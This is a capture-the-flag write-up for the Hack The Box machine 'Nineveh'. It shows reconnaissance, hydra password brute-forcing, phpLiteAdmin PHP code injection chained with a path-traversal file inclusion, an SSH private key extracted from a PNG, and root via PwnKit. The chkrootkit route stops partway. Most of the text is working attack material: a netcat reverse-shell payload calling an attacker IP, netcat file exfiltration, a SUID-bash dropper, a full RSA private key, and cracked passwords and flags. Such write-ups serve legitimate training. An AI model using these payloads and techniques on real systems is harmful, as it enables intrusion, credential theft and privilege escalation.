Nineveh-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: directory enumeration, password brute-forcing, hydra, phpLiteAdmin PHP code injection, arbitrary file inclusion, an SSH key hidden inside a PNG, binwalk, CVE-2021-4034 (pkexec / PwnKit), chkrootkit local privilege escalation

Reference: https://yufongg.github.io/posts/Nineveh/

0x01 Getting a user shell

1. Target IP address: 10.10.10.43

2. Open ports (full TCP sweep first, then service and script scan on what it found; note that 22/tcp is not among the open ports, which matters later):

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=5000 10.10.10.43
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 22:22 CST
Nmap scan report for nineveh.htb (10.10.10.43)
Host is up (1.1s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 32.39 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,443 -sC -sV --min-rate=5000 10.10.10.43
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 22:28 CST
Nmap scan report for nineveh.htb (10.10.10.43)
Host is up (1.1s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/https Apache/2.4.18 (Ubuntu)
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.73 seconds

3. Bind the hostname from the TLS certificate (nineveh.htb) locally

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.43 nineveh.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.10.43 nineveh.htb

4. A quick look at the exposed web sites. The HTTP vhost has a department login, the HTTPS vhost has phpLiteAdmin under /db/ (its login form asks for a password only):

http://10.10.10.43/

https://nineveh.htb/

https://nineveh.htb/db/

Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114

This PHP warning leaks the absolute path of the HTTPS web root (/var/www/ssl/), which is useful when an absolute path is needed for the file inclusion later.

http://nineveh.htb/department/login.php

5. Brute-forcing both login forms with hydra yields a password for each site. For /db/ the form has no username field, so -l admin is only a placeholder and the failure string "Incorrect password" is what hydra keys on; for /department/login.php both fields are posted and "Invalid Password" marks a failed attempt:

┌──(kali㉿offsec)-[~/Desktop]
└─$ hydra 10.10.10.43 -l admin -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-27 22:27:31
[DATA] max 16 tasks per 1 server, overall 16 tasks, 399 login tries (l:1/p:399), ~25 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password
[STATUS] 40.00 tries/min, 40 tries in 00:01h, 359 to do in 00:09h, 16 active
[STATUS] 41.67 tries/min, 125 tries in 00:03h, 274 to do in 00:07h, 16 active
[443][http-post-form] host: 10.10.10.43 login: admin password: password123
[STATUS] 57.00 tries/min, 399 tries in 00:07h, 1 to do in 00:01h, 5 active

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hydra nineveh.htb -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password"
[sudo] password for kali:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-27 22:32:25
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://nineveh.htb:80/department/login.php:username=^USER^&password=^PASS^:Invalid Password
[STATUS] 197.00 tries/min, 197 tries in 00:01h, 14344202 to do in 1213:34h, 16 active
[STATUS] 213.67 tries/min, 641 tries in 00:03h, 14343758 to do in 1118:52h, 16 active
[STATUS] 186.14 tries/min, 1303 tries in 00:07h, 14343096 to do in 1284:15h, 16 active
[STATUS] 161.47 tries/min, 2422 tries in 00:15h, 14341977 to do in 1480:24h, 16 active
[80][http-post-form] host: nineveh.htb login: admin password: 1q2w3e4r5t

https://nineveh.htb/db/

password123

http://nineveh.htb/department/login.php

admin:1q2w3e4r5t

6. A little probing shows that the notes parameter of manage.php is an arbitrary file inclusion. Judging from which payloads are accepted, the page only includes the file when the value contains the string ninevehNotes; it is a substring check, not a restriction on the directory, so a non-existent leading directory named ninevehNotes followed by ../ traversal passes it (PHP collapses the .. components before opening the file):

http://nineveh.htb/department/manage.php

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt

http://nineveh.htb/department/manage.php?notes=../files/ninevehNotes.txt
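The inclusion filter, as an added example that is not part of the original write-up or of the box's real source: the first function models the behaviour the payloads above imply (accept any value that contains ninevehNotes, then let PHP collapse the path), and the second is the resolver a developer should have written instead, anchored to a fixed notes directory. The directory name NOTES_DIR and the function names are assumptions for illustration.

```python
# Added example (not from the write-up or the target's source): models the
# keyword filter that the manage.php payloads imply, and a hardened resolver.
import posixpath
from typing import Optional

# Assumption for illustration: the directory the notes are meant to come from.
NOTES_DIR = "/var/www/html/department/files"
KEYWORD = "ninevehNotes"


def vulnerable_include_path(notes: str) -> Optional[str]:
    """Model of the filter inferred from the payloads: the value is accepted as
    soon as it contains the keyword anywhere, then handed to include().
    PHP collapses '.' and '..' components before opening the file, which
    posixpath.normpath reproduces, so a non-existent leading directory such as
    /ninevehNotes/ is no obstacle to traversal."""
    if KEYWORD not in notes:
        return None
    return posixpath.normpath(notes)


def hardened_include_path(notes: str) -> Optional[str]:
    """Resolve against NOTES_DIR and keep only paths that stay inside it.
    Rejects absolute paths (posixpath.join would otherwise discard NOTES_DIR),
    traversal, NUL bytes and anything that is not a .txt note. A real
    implementation should additionally realpath() the result so symlinks
    inside NOTES_DIR cannot point back out of it."""
    if "\x00" in notes or posixpath.isabs(notes):
        return None
    candidate = posixpath.normpath(posixpath.join(NOTES_DIR, notes))
    if not candidate.startswith(NOTES_DIR + "/"):
        return None
    if not candidate.endswith(".txt"):
        return None
    return candidate


if __name__ == "__main__":
    for p in ("ninevehNotes.txt",
              "/ninevehNotes/../../../var/tmp/rce.php",
              "../../../../etc/passwd"):
        print(f"{p!r:45} vulnerable -> {vulnerable_include_path(p)!r:25} "
              f"hardened -> {hardened_include_path(p)!r}")
```

The substring check is the whole bug: the keyword only has to appear somewhere in the string, and the traversal that follows it is still resolved by PHP. Anchoring to a directory and checking the normalized result is what turns the parameter back into a file name rather than a path.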

7. Meanwhile, the phpLiteAdmin admin interface under /db/ on the HTTPS vhost has a known PHP code injection (searchsploit entry 24044):

https://nineveh.htb/db/index.php

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit phpLiteAdmin
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
phpLiteAdmin - 'table' SQL Injection | php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities | php/webapps/37515.txt
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities | php/webapps/39714.txt
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m 24044
Exploit: PHPLiteAdmin 1.9.3 - Remote PHP Code Injection
URL: https://www.exploit-db.com/exploits/24044
Path: /usr/share/exploitdb/exploits/php/webapps/24044.txt
Codes: OSVDB-89126
Verified: True
File Type: ASCII text
Copied to: /home/kali/Desktop/24044.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat 24044.txt
# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
# Vendor Homepage: http://code.google.com/p/phpliteadmin/
# Vendor Status: Informed
# Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip
# Version: 1.9.3
# Tested on: Windows and Linux

Description:

phpliteadmin.php#1784: 'Creating a New Database' =>
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.

Proof of Concept:

1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ

2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ

3. Now we run hack.php

Done!

Proof: http://goo.gl/ZqPVL

8. Follow the PoC. The new database is named with an absolute path, /var/tmp/rce.php, so it lands in a world-writable directory that the file inclusion can reach; then a table is created whose text column has the PHP payload as its default value. SQLite stores that default verbatim inside the file, and PHP ignores the binary bytes around it, so only the <?php ... ?> region executes when the file is included. Start the nc listener on 443 before triggering it:

https://nineveh.htb/db/index.php

https://nineveh.htb/db/index.php?switchdb=%2Fvar%2Ftmp%2Frce.php

https://nineveh.htb/db/index.php?action=table_create

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 443 >/tmp/f");?>

9. Including that file through the manage.php file inclusion on the other vhost executes the payload and gives an initial shell as www-data:

http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../../../var/tmp/rce.php

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.43] 53294
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 2: python: not found
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@nineveh:/var/www/html/department$

www-data@nineveh:/var/www/html/department$

10. With the reverse shell in hand, upgrade it to a fully interactive TTY (script for a pty, then stty raw -echo on the attacker side so Ctrl-C and tab completion reach the remote shell):

www-data@nineveh:/var/www/html/department$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
www-data@nineveh:/var/www/html/department$ ^Z
zsh: suspended nc -lvnp 443

┌──(kali㉿offsec)-[~/Desktop]
└─$ stty raw -echo; fg
[1] + continued nc -lvnp 443
reset
reset: unknown terminal type unknown
Terminal type? screen


www-data@nineveh:/var/www/html/department$


www-data@nineveh:/var/www/html/department$ ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Jul 2 2017 .
drwxr-xr-x 24 root root 4096 Jan 29 2021 ..
drwxr-xr-x 4 amrois amrois 4096 Dec 17 2020 amrois
www-data@nineveh:/var/www/html/department$

11. After a round of enumeration, the image nineveh.png under /var/www/ssl/secure_notes turns out to contain an SSH key pair; strings -n 20 is enough to spot the PEM block and the matching ssh-rsa line for amrois@nineveh.htb:

www-data@nineveh:/var/www/html/department$ cd /home/amrois
www-data@nineveh:/home/amrois$ ls -la
total 32
drwxr-xr-x 4 amrois amrois 4096 Dec 17 2020 .
drwxr-xr-x 3 root root 4096 Jul 2 2017 ..
lrwxrwxrwx 1 root root 9 Dec 17 2020 .bash_history -> /dev/null
-rw-r--r-- 1 amrois amrois 220 Jul 2 2017 .bash_logout
-rw-r--r-- 1 amrois amrois 3765 Jul 2 2017 .bashrc
drwx------ 2 amrois amrois 4096 Jul 3 2017 .cache
-rw-r--r-- 1 amrois amrois 655 Jul 2 2017 .profile
drwxr-xr-x 2 amrois amrois 4096 Jul 2 2017 .ssh
-rw------- 1 amrois amrois 33 May 26 10:48 user.txt
www-data@nineveh:/home/amrois$



www-data@nineveh:/home/amrois$ cd /var/www/
www-data@nineveh:/var/www$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Jul 2 2017 .
drwxr-xr-x 14 root root 4096 Jul 2 2017 ..
drwxr-xr-x 2 root root 4096 Jul 2 2017 cd
drwxr-xr-x 3 root root 4096 Jul 2 2017 html
drwxr-xr-x 4 root root 4096 Jul 2 2017 ssl
www-data@nineveh:/var/www$ cd ssl
www-data@nineveh:/var/www/ssl$ ls -la
total 568
drwxr-xr-x 4 root root 4096 Jul 2 2017 .
drwxr-xr-x 5 root root 4096 Jul 2 2017 ..
drwxr-xr-x 2 root root 4096 Jul 2 2017 db
-rw-r--r-- 1 root root 49 Jul 2 2017 index.html
-rw-r--r-- 1 root root 560852 Jul 2 2017 ninevehForAll.png
drwxr-xr-x 2 root root 4096 Jul 2 2017 secure_notes
www-data@nineveh:/var/www/ssl$ cd secure_notes/
www-data@nineveh:/var/www/ssl/secure_notes$ ls -la
total 2840
drwxr-xr-x 2 root root 4096 Jul 2 2017 .
drwxr-xr-x 4 root root 4096 Jul 2 2017 ..
-rw-r--r-- 1 root root 71 Jul 2 2017 index.html
-rw-r--r-- 1 root root 2891984 Jul 2 2017 nineveh.png
www-data@nineveh:/var/www/ssl/secure_notes$


www-data@nineveh:/var/www/ssl/secure_notes$ strings -n 20 nineveh.png
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
www-data@nineveh:/var/www/ssl/secure_notes$

12. That is another user's SSH key. To show how it was found, first transfer the file to the attacking machine and run binwalk: the key pair sits in a tar archive appended after the PNG image data, and binwalk -e extracts it to _nineveh.png.extracted/secret/. Before relying on the extracted private key, confirm it matches nineveh.pub (ssh-keygen -y regenerates the public key from the private one); here the strings output above already shows both halves side by side.

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lnp 6666 > nineveh.png


www-data@nineveh:/var/www/ssl/secure_notes$
<sl/secure_notes$ nc -v 10.10.14.45 6666 < nineveh.png
Connection to 10.10.14.45 6666 port [tcp/*] succeeded!
www-data@nineveh:/var/www/ssl/secure_notes$
www-data@nineveh:/var/www/ssl/secure_notes$


┌──(kali㉿offsec)-[~/Desktop]
└─$ binwalk nineveh.png

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo binwalk -eM --run-as=root nineveh.png
[sudo] password for kali:

Scan Time: 2024-05-27 23:32:43
Target File: /home/kali/Desktop/nineveh.png
MD5 Checksum: 353b8f5a4578e4472c686b6e1f15c808
Signatures: 411

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)


Scan Time: 2024-05-27 23:32:43
Target File: /home/kali/Desktop/_nineveh.png.extracted/54
MD5 Checksum: d41d8cd98f00b204e9800998ecf8427e
Signatures: 411

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------


Scan Time: 2024-05-27 23:32:43
Target File: /home/kali/Desktop/_nineveh.png.extracted/secret/nineveh.priv
MD5 Checksum: f426d661f94b16292efc810ebb7ea305
Signatures: 411

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PEM RSA private key


Scan Time: 2024-05-27 23:32:43
Target File: /home/kali/Desktop/_nineveh.png.extracted/secret/nineveh.pub
MD5 Checksum: 6b60618d207ad97e76664174e805cfda
Signatures: 411

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 OpenSSH RSA public key
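Carving the archive by hand, as an added example that is not part of the original write-up: binwalk reports a POSIX tar archive appended after the image data, and the script below does the same on a constructed sample (a valid 1x1 PNG with a tar holding a placeholder secret/demo.priv). It walks the PNG chunk list to find where the image really ends, then validates the ustar header checksum before handing the tail to tarfile, so a stray "ustar" inside compressed pixel data is not mistaken for an archive. The member name, its placeholder contents and the function names are assumptions.

```python
# Added example (not from the write-up): carve a tar archive appended after a
# PNG, the layout binwalk reports for nineveh.png. Runs offline on a
# constructed sample; secret/demo.priv and its body are placeholders.
import io
import struct
import tarfile
import zlib
from typing import Dict, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"
USTAR_MAGIC_OFFSET = 257  # position of the 'ustar' magic inside a tar header


def png_end_offset(data: bytes) -> int:
    """Walk the chunk list and return the offset just past IEND; everything
    after that offset is foreign to the image."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4          # header + payload + CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk")


def tar_header_checksum_ok(block: bytes) -> bool:
    """Recompute the header checksum (byte sum with the checksum field taken
    as eight spaces) so a chance 'ustar' string is not accepted as a header."""
    if len(block) < 512:
        return False
    try:
        stored = int(block[148:156].split(b"\0")[0].strip() or b"0", 8)
    except ValueError:
        return False
    return stored == sum(block[:148]) + 8 * 0x20 + sum(block[156:512])


def find_tar_offset(data: bytes, start: int = 0) -> int:
    """Offset of the first valid tar header at or after 'start', else -1."""
    pos = data.find(b"ustar", start)
    while pos != -1:
        hdr = pos - USTAR_MAGIC_OFFSET
        if hdr >= start and tar_header_checksum_ok(data[hdr:hdr + 512]):
            return hdr
        pos = data.find(b"ustar", pos + 1)
    return -1


def extract_appended(data: bytes) -> Dict[str, bytes]:
    """Return {member name: content} for the regular files in the appended tar."""
    offset = find_tar_offset(data, png_end_offset(data))
    if offset == -1:
        return {}
    files: Dict[str, bytes] = {}
    with tarfile.open(fileobj=io.BytesIO(data[offset:]), mode="r:") as tf:
        for member in tf.getmembers():
            if member.isfile():
                files[member.name] = tf.extractfile(member).read()
    return files


def build_sample() -> Tuple[bytes, bytes]:
    """Constructed input: a valid 1x1 RGB PNG, and the same PNG with a tar
    appended that holds a placeholder private key file."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        return (struct.pack(">I", len(body)) + ctype + body
                + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF))
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\x00\x00\x00")             # filter byte + 1 pixel
    png = PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")

    body = (b"-----BEGIN RSA PRIVATE KEY-----\n"
            b"placeholder, not a real key\n"
            b"-----END RSA PRIVATE KEY-----\n")
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("secret/demo.priv")
        info.size = len(body)
        tf.addfile(info, io.BytesIO(body))
    return png, png + buf.getvalue()


if __name__ == "__main__":
    png, blob = build_sample()
    end = png_end_offset(blob)
    print("image ends at", end, "- tar header at", find_tar_offset(blob, end))
    for name, content in extract_appended(blob).items():
        print(name, len(content), "bytes")
```

On the real file the same logic gives the 0x2BF8D0 offset binwalk printed: the IEND chunk ends well before that, and the first checksum-valid ustar header after it is the archive. Reading the member list before extracting (getmembers) also avoids writing attacker-controlled paths to disk, which binwalk -e does without asking.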

13. SSH is not reachable from outside (the port scan only showed 80 and 443), but sshd is listening on localhost, so the user switch is done from the www-data shell: fetch the private key onto the box, restrict its permissions (ssh refuses a key that is group- or world-readable) and connect to 127.0.0.1 with it:

www-data@nineveh:/var/www/ssl/secure_notes$ cd /tmp
www-data@nineveh:/tmp$ wget 10.10.14.45/nineveh.priv
--2024-05-27 02:43:46-- http://10.10.14.45/nineveh.priv
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1675 (1.6K) [application/octet-stream]
Saving to: 'nineveh.priv'

nineveh.priv 100%[===================>] 1.64K --.-KB/s in 0.03s

2024-05-27 02:43:47 (64.3 KB/s) - 'nineveh.priv' saved [1675/1675]

www-data@nineveh:/tmp$ ls -la
total 40
drwxrwxrwt 9 root root 4096 May 27 02:43 .
drwxr-xr-x 24 root root 4096 Jan 29 2021 ..
drwxrwxrwt 2 root root 4096 May 26 10:48 .ICE-unix
drwxrwxrwt 2 root root 4096 May 26 10:48 .Test-unix
drwxrwxrwt 2 root root 4096 May 26 10:48 .X11-unix
drwxrwxrwt 2 root root 4096 May 26 10:48 .XIM-unix
drwxrwxrwt 2 root root 4096 May 26 10:48 .font-unix
prw-r--r-- 1 www-data www-data 0 May 27 02:43 f
-rw-r--r-- 1 www-data www-data 1675 May 27 2024 nineveh.priv
drwx------ 3 root root 4096 May 26 10:48 systemd-private-ad3cdfb60db0415996f4eb34b1ec1207-systemd-timesyncd.service-RpSvjR
drwx------ 2 root root 4096 May 26 10:48 vmware-root
www-data@nineveh:/tmp$ chmod 600 ./nineveh.priv
www-data@nineveh:/tmp$ ssh amrois@localhost -i nineveh.priv
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

288 packages can be updated.
207 updates are security updates.


You have mail.
Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ id
uid=1000(amrois) gid=1000(amrois) groups=1000(amrois)
amrois@nineveh:~$ pwd
/home/amrois
amrois@nineveh:~$

14. That gives the first flag:

amrois@nineveh:~$ cat user.txt 
721fd8afb8ea1480e4db0fa713754877
amrois@nineveh:~$

0x02 Getting root

15. Running linpeas for enumeration turns up two ways to escalate: the SUID pkexec on this unpatched Ubuntu 16.04 (CVE-2021-4034, PwnKit) and a vulnerable chkrootkit that runs as root.

16. Take the first route (PwnKit) and grab the final flag. The script is fetched from the attacking machine's web server and run as amrois; note the resulting shell has uid 0 but keeps gid 1000, because the exploit only changes the user id:

CVE-2021-4034

https://github.com/joeammond/CVE-2021-4034

amrois@nineveh:~$ wget 10.10.14.45/CVE-2021-4034.py
--2024-05-27 02:50:18-- http://10.10.14.45/CVE-2021-4034.py
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: ‘CVE-2021-4034.py’

CVE-2021-4034.py 100%[===================>] 3.19K --.-KB/s in 0.03s

2024-05-27 02:50:24 (105 KB/s) - ‘CVE-2021-4034.py’ saved [3262/3262]

amrois@nineveh:~$ ls -la
total 36
drwxr-xr-x 4 amrois amrois 4096 May 27 02:50 .
drwxr-xr-x 3 root root 4096 Jul 2 2017 ..
lrwxrwxrwx 1 root root 9 Dec 17 2020 .bash_history -> /dev/null
-rw-r--r-- 1 amrois amrois 220 Jul 2 2017 .bash_logout
-rw-r--r-- 1 amrois amrois 3765 Jul 2 2017 .bashrc
drwx------ 2 amrois amrois 4096 Jul 3 2017 .cache
-rw-rw-r-- 1 amrois amrois 3262 May 27 2024 CVE-2021-4034.py
-rw-r--r-- 1 amrois amrois 655 Jul 2 2017 .profile
drwxr-xr-x 2 amrois amrois 4096 Jul 2 2017 .ssh
-rw------- 1 amrois amrois 33 May 26 10:48 user.txt
amrois@nineveh:~$ chmod +x CVE-2021-4034.py
amrois@nineveh:~$ python3 ./CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1000(amrois) groups=1000(amrois)
# cat /root/root.txt
a0bf015e98ee7483a9a841a9cd16fc9c
#

17. The other route to root: the chkrootkit vulnerability. chkrootkit 0.49 (CVE-2014-0476) executes /tmp/update as root if such a file exists, and on this box chkrootkit is run periodically as root, so a script dropped at that path is executed within a minute. The script copies /bin/bash and sets the SUID bit on the copy; the copy must then be started with -p, otherwise bash drops the effective uid back to the caller's:

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit chkrootkit
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit) | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results



Create the script that drops a SUID copy of /bin/bash (with nano, or with a single echo; both produce the same file):

amrois@nineveh:~$ nano /tmp/update

cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash

amrois@nineveh:~$ chmod +x /tmp/update


